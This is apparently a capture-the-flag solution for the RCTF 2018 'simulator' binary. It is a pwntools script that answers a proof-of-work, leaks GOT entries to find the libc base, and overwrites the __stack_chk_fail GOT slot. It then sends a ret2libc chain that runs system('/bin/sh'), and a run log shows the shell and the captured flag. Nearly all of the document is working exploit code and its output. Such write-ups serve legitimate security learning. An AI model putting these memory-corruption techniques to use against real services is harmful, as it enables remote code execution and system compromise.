
```
from pwn import *
from time import sleep
from hashlib import sha256
import itertools
import string

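def pow():
    """Solve the server's proof-of-work and send the answer over ``t``.

    Reads one line (the challenge prefix) from the global connection ``t``,
    searches for a 4-byte suffix such that ``sha256(prefix + suffix)`` starts
    with three NUL bytes, and writes that suffix back with ``t.sendline``.
    Logs "Failed PoW" (and sends nothing) if no suffix is found.

    Note: this is Python 2 code -- ``str`` doubles as the byte string here and
    comparing ``.digest()`` against a ``str`` of NULs only works there.  The
    function name shadows the builtin ``pow``; it is kept because the script
    below calls it by this name.
    """
    prefix = t.recvline().strip()
    log.info("Calculating PoW: {}".format(prefix))

    alphabet = [chr(i) for i in range(256)]
    val = None
    # itertools.product walks every 4-byte suffix.  The previous
    # combinations_with_replacement only visited non-decreasing tuples, i.e. a
    # subset of the space, so it could exhaust its candidates without a hit.
    for combo in itertools.product(alphabet, repeat=4):
        candidate = ''.join(combo)
        h = sha256(prefix + candidate)  # hash once, reuse for the check and the log
        if h.digest().startswith('\0\0\0'):
            log.info("Done: {}".format(h.hexdigest()))
            val = candidate
            break

    if val is not None:
        t.sendline(val)
    else:
        log.info("Failed PoW")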

# Local debugging harness (disabled); the live target is the remote service.
#t = process('./simulator', env={'LD_PRELOAD': '/home/bob/sim_libc.so'})
#print("Attach...")
#sleep(4)

HOST, PORT = 'simulator.2018.teamrois.cn', 3131
t = remote(HOST, PORT)
pow()  # the server gates the session behind a proof-of-work; answer it first

# Program handed to the simulator.  It loads from the GOT slots named in the
# comments, prints one value via syscall 1, and stores a new value into the
# __stack_chk_fail slot.  The text is sent verbatim, comment lines included,
# so nothing inside the string may be changed.
code = """
# # Leak GOT entry of feof
# li $t0, 3766524421
# lw $t1, $t0
# move $a0, $t1
# li $v0, 1
# syscall

# # Leak GOT entry of setvbuf
# li $t0, 3766524424
# lw $t1, $t0
# move $a0, $t1
# li $v0, 1
# syscall

# # Leak GOT entry of __libc_start_main
li $t0, 3766524423
lw $t1, $t0
#move $a0, $t1
#li $v0, 1
#syscall

# Subtract to get libc base and leak
li $t0, 3766524421
lw $t1, $t0
li $s0, 411664
sub $t2, $t1, $s0
move $a0, $t2
li $v0, 1
syscall

# Overwrite __stack_chk_fail GOT to point to "leave; ret"
li $t0, 134523990
li $t1, 3766524419
sw $t0, $t1

END
"""

t.send(code)

# The simulator prints the leaked base as a signed 32-bit decimal; adding 2**32
# recovers the unsigned address (assumes the printed value is negative, i.e.
# the high bit is set, as in the run log below).
base = int(t.recvline()) + 0x100000000

# Offsets into this libc build; taken as given by the original author.
binsh = base + 0x15902b
system = base + 0x3a940
log.info("libc base: {}".format(hex(base)))
log.info("/bin/sh: {}".format(hex(binsh)))
log.info("system: {}".format(hex(system)))

# Stack payload: 48 bytes of filler, then three little-endian words --
# the system address, a dummy return address for it, and the "/bin/sh"
# pointer as its argument (presumably the usual ret2libc layout; the
# filler length comes from the original script).
padding = "A" * 44 + 'BBBB'
chain = [p32(system), p32(0xdeadbeef), p32(binsh)]
buf = padding + ''.join(chain)

log.info("Executing system('/bin/sh')")
t.sendline(buf)

t.recv()  # drain whatever the program prints before handing over the terminal
t.interactive()
```

Running this gives:
```
vagrant@vagrant:~$ python /vagrant/shared/simulator.py
[+] Opening connection to simulator.2018.teamrois.cn on port 3131: Done
[*] Calculating PoW: IlBn0dsx9Hj0daP0
[*] Done: 00000091b2fa928489c69cfe2474309c3db3c26640958cb4152ce8a8762337d8
[*] libc base: 0xf7d9a000
[*] /bin/sh: 0xf7ef302b
[*] system: 0xf7dd4940
[*] Executing system('/bin/sh')
[*] Switching to interactive mode
$ cat flag
RCTF{5imu_s1mu_sinnu_siml_l_simulator!_7a3dac}
```